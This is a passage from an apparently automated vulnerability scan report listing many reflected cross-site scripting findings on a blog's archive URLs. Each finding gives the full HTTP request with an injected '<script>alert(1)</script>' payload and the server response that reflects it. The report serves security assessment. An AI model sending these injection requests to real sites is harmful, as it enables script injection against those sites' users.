Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...

1.113. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...

1.114. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...

1.115. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...

1.116. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...

1.117. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...

1.118. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...

1.119. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...

1.120. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...

1.121. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...

1.122. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...

1.123. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...

1.124. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...

1.125. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...

1.126. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...

1.127. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...

1.128. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...

1.129. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
